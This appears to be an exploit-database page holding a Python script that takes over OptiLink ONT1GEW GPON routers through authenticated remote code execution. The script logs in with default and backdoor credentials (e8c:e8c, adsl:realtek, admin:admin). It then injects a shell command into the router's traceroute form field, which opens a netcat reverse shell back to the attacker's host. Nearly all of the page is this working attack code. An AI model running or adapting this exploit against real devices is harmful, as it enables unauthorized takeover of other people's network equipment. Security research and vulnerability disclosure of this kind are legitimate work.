optilink ont1gew gpon 2.1.11_x101 build 1127.190306 remote code execution (authenticated)

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optilink ont1gew gpon 2.1.11_x101 build 1127.190306 remote code execution (authenticated) Code Code...
# Exploit Title: OptiLink ONT1GEW GPON 2.1.11_X101 Build 1127.190306 - Remote Code Execution (Authenticated) # Date: 23/03/2021 # Exploit Authors: Developed by SecNigma and Amal. # Vendor Homepage: https://optilinknetwork.com/ # Version: ONT1GEW V2.1.11_X101 Build.1127.190306 # Mitigation: Ask the vendor to issue a router upgrade to Build.1653.210425 and above, # as they do not release the firmware to the public for some unknown reason. # Additional notes: # Tested on the following configuration. Might be suitable for other OptiLink devices with Build <= 1127.190306. # Device Name: ONT1GEW # Software Version: V2.1.11_X101 # Build Information: Build.1127.190306 # Chances are that XPONs of C-DATA company are affected too. # Our research indicated that Optilink devices are just a rebranded version of C-Data. # This exploit was tested on the following configuration. #!/usr/bin/python3 import requests import argparse import re def is_login_success(r): match=re.findall("invalid username!|bad password!|you have logined error 3 consecutive times, please relogin 1 minute later!|another user have logined in",r.text) if match: return match # Default configuration # Router address = # LPORT = 9001 # Default Username = e8c / Backdoor / # Default Password = e8c / Credentials / parser= argparse.ArgumentParser() parser.add_argument("-t", "--target", dest = "target", default = "", help="Target OptiLink Router IP") parser.add_argument("-l", "--lhost", dest = "lhost" , help="Our Local IP to catch the shell!", required=True) parser.add_argument("-lp", "--lport", dest = "lport", default = "9001", help="Our Local port for catching the shell!") parser.add_argument("-u", "--user", dest = "user", default = "e8c", help="Username of Optilink Router") parser.add_argument("-p", "--pass", dest = "passw", default = "e8c", help="Password of Optilink Router") args = parser.parse_args() target=args.target, lhost=args.lhost, lport=args.lport, user=args.user, passw=args.passw # e8c:e8c are the backdoor administrator creds to Optilink devices # Alternate backdoor credentials are adsl:realtek, admin:admin. user2="e8c" passw2="e8c" home_url="http://"+target[0]+"/boaform/admin/formLogin" print("[+] Trying to authenticate...") # Authenticate ourselves first data={'username':user, 'psd':passw} r=requests.post(home_url,data) res=is_login_success(r) if res: print("[-] Exploit failed when using the following credentials: "+str(user)+":"+str(passw)+"") print("[-] Exploit failed with the following error:") print(res) print("[!] Do you want to try to authenticate with the following credentials: "+str(user2)+":"+str(passw2)+" ?") val = input("Press y or n : ") if val[0].lower()=="y": print("[+] Trying to authenticate with the credentials "+str(user2)+":"+str(passw2)+"") # Authenticate ourselves with new creds data={'username':user2, 'psd':passw2} r=requests.post(home_url,data) res2=is_login_success(r) if res2: print("[-] Exploit failed when using the following credentials: "+str(user2)+":"+str(passw2)+"") print("[-] Exploit failed with the following error:") print(res2) print("[-] Halting Execution.") exit() else: print("Received input "+val+"") print("[-] Halting Execution.") exit() print("[+] Looks like authentication was succesful!") print("[+] Trying to fetch the WAN Name...") # Fetching Wan Name # wan_name="1_INTERNET_R_VID_***" get_wan_url = "http://"+target[0]+"/diag_ping.asp" r=requests.get(get_wan_url) match=re.findall("name=\"waninf\"><option value=\"(.*?)\">",r.text) wan_name=match[0] print("[+] Initiating Exploitation. Don't forget to start the nc listener on port "+str(lport)+"..") print("[+] I'm Waiting...Said Captain Jagdish *wink* *wink*") print("[+] If everything went right, you should've gotten a shell right now!") # Starting Exploitation # The same vulnerability exists in formPing and formTracert. # exploit_url = "http://"+target[0]+"/boaform/admin/formPing" exploit_url = "http://"+target[0]+"/boaform/admin/formTracert" # Found a new way to get reverse shell using mknod instead of mkfifo during the exploitation of this router :) # BusyBox binary used by this router was very limited and didn't had mkfifo. So, we got creative to workaround it. # The payload is available at swisskeyrepo's PayloadAllTheThings GitHub repo as Netcat BusyBox payload. # https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md#netcat-busybox post_data='target_addr="`rm+/tmp/f%3bmknod+/tmp/f+p%3bcat+/tmp/f|/bin/sh+-i+2>%261|nc+'+lhost[0]+'+'+lport[0]+'+>/tmp/f`"&waninf='+wan_name+'"' r=requests.post(exploit_url,post_data)

Optilink ont1gew gpon 2.1.11_x101 build 1127.190306 remote code execution (authenticated) Vulnerability / Exploit Source : Optilink ont1gew gpon 2.1.11_x101 build 1127.190306 remote code execution (authenticated)

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